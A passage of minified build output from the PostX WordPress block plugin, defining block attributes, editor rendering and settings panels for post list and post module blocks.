auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,  \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,  \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,  \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["metaHoverColor"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:0,bottom:10,left:0,right:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"25",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},1845:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(73576),r=l(44371),s=l(66026);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-4/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-4.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist4.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-3","listBlocks")]},usesContext:["post-grid-parent/postBlockClientId"],edit:n.Z,save:()=>null})},30077:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(76778);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,className:N,attributes:j,context:Z,isSelected:O,clientId:R,attributes:{blockId:D,readMoreIcon:z,excerptLimit:F,showFullExcerpt:W,showSmallMeta:V,metaStyle:G,metaShow:q,catShow:$,metaSeparator:K,titleShow:J,catStyle:Y,catPosition:X,titlePosition:Q,excerptShow:ee,metaList:te,metaListSmall:le,showSmallCat:oe,readMore:ae,readMoreText:ie,showSmallBtn:ne,showSmallExcerpt:re,varticalAlign:se,columnFlip:pe,metaPosition:ce,layout:ue,customCatColor:de,onlyCatColor:me,contentTag:ge,titleTag:ye,showSeoMeta:be,titleLength:ve,metaMinText:he,metaAuthorPrefix:fe,titleStyle:ke,metaDateFormat:we,authorLink:xe,vidIconEnable:Te,notFoundMessage:_e,dcEnabled:Ce,dcFields:Ee,previewImg:Se,advanceId:Pe,headingShow:Le,filterShow:Ie,paginationShow:Be,paginationType:Ue,navPosition:Me,V4_1_0_CompCheck:{runComp:Ae},currentPostId:He}}=e;function Ne(e){B({...l,selectedDC:e})}function je(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ze(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Oe(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Re(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(j)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Re()}),[]),T((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,He,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),T((()=>{const e=t.current;(0,b.o6)()&&0===j.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&(Re(),t.current=j),e.isSelected!==O&&O&&(0,f.gT)(Ze,Oe)):t.current=j}),[j]);const De={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:j,setSection:Ze,section:l.section,clientId:R,context:Z,setSelectedDc:Ne,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ne(e),Oe("dc_group")}};let ze;if(D&&(ze=(0,m.Kh)(j,"ultimate-post/post-module-1",D,(0,a.k0)())),Se)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Se});const Fe=x({...Pe&&{id:Pe},className:`ultp-block-${D} ${N}`,onClick:e=>{e.stopPropagation(),Ze("general"),Oe("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:De,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:De})),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-module-1",key:"layout",options:[{img:"assets/img/layouts/pm1/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm1/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm1/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm1/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm1/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Ae?"exclude":"dep"]:a.N2}],store:De}),(0,o.createElement)("div",Fe,ze&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ze}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Le||Ie||Be)&&(0,o.createElement)(r.m,{attributes:j,setAttributes:A,onClick:()=>{Ze("heading"),Oe("heading")},setSection:Ze,setToolbarSettings:Oe}),function(){const e=`${ge}`,t=[],a=[],r=(e,t)=>(0,b.o6)()&&Ce&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ee,settingsOnClick:(e,t)=>{e?.stopPropagation(),Oe(t)},selectedDC:l.selectedDC,setSelectedDc:Ne,setAttributes:A,dcFields:Ee});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-post-module1 ultp-block-content-${se} ultp-block-content-${pe} ultp-${ue}`},l.postsList.map(((l,c)=>{const m=0==c?JSON.parse(te.replaceAll("u0022",'"')):JSON.parse(le.replaceAll("u0022",'"'));(0==c?t:a).push((0,o.createElement)(e,{key:c,className:`ultp-block-item post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},0===c&&r(8,l.ID),(0,o.createElement)(s.y6,{attributes:j,post:l,idx:c,VideoContent:Te&&l.has_video?(0,o.createElement)(s.nk,{onClick:e=>{e.preventDefault(),Ze("video"),Oe("video")}}):null,CatCotent:0!==c&&!oe||"aboveTitle"==X?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:$,catStyle:Y,catPosition:X,customCatColor:de,onlyCatColor:me,onClick:e=>{Ze("taxonomy-/-category"),Oe("cat")}})),onClick:()=>{Ze("image"),Oe("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},0!==c&&r(8,l.ID),r(7,l.ID),"aboveTitle"==X&&(0===c||oe)&&(0,o.createElement)(i.Z,{post:l,catShow:$,catStyle:Y,catPosition:X,customCatColor:de,onlyCatColor:me,onClick:e=>{Ze("taxonomy-/-category"),Oe("cat")}}),r(6,l.ID),l.title&&J&&1==Q&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ye,titleLength:ve,titleStyle:ke,onClick:e=>{Ze("title"),Oe("title")}}),r(5,l.ID),(0===c||V)&&q&&"top"==ce&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:K,metaStyle:G,metaMinText:he,metaAuthorPrefix:fe,metaDateFormat:we,authorLink:xe,onClick:e=>{Ze("meta"),Oe("meta")}}),r(4,l.ID),l.title&&J&&0==Q&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ye,titleLength:ve,titleStyle:ke,onClick:e=>{Ze("title"),Oe("title")}}),r(3,l.ID),(0===c||re)&&ee&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:W,showSeoMeta:be,onClick:e=>{Ze("excerpt"),Oe("excerpt")}}),r(2,l.ID),(0===c||ne)&&ae&&(0,o.createElement)(u.Z,{readMoreText:ie,readMoreIcon:z,titleLabel:l.title,onClick:()=>{Ze("read-more"),Oe("read-more")}}),r(1,l.ID),(0===c||V)&&q&&"bottom"==ce&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:K,metaStyle:G,metaMinText:he,metaAuthorPrefix:fe,metaDateFormat:we,authorLink:xe,onClick:e=>{Ze("meta"),Oe("meta")}}),r(0,l.ID),(0,b.o6)()&&Ce&&(0,o.createElement)(v.Z,{dcFields:Ee,setAttributes:A,startOnboarding:je})))))})),(0,o.createElement)("div",{className:"ultp-big-post-module1"},t),(0,o.createElement)("div",{className:"ultp-small-post-module1"},a)):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:_e})}(),Be&&"navigation"==Ue&&"topRight"!=Me&&(0,o.createElement)(c.Z,{onClick:()=>{Ze("pagination"),Oe("pagination")}}))))}},76778:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6825",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns"],include:[{position:0,data:{type:"layout",block:"post-module-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pm1/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm1/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm1/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm1/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm1/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:3,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,_inline:!0,label:__("Large Image Height","ultimate-post")}},{position:7,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}},{position:12,data:{type:"tag",key:"varticalAlign",label:__("Small Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"],include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:4,data:{type:"range",key:"lgImgSpacing",label:__("Large Image Spacing ( Y )","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,initialOpen:b.excerpt,depend:"excerptShow",include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],store:t,hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),("layout4"===l||"layout5"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({include:[{position:7,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaMargin","metaPadding","metaSpacing"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read 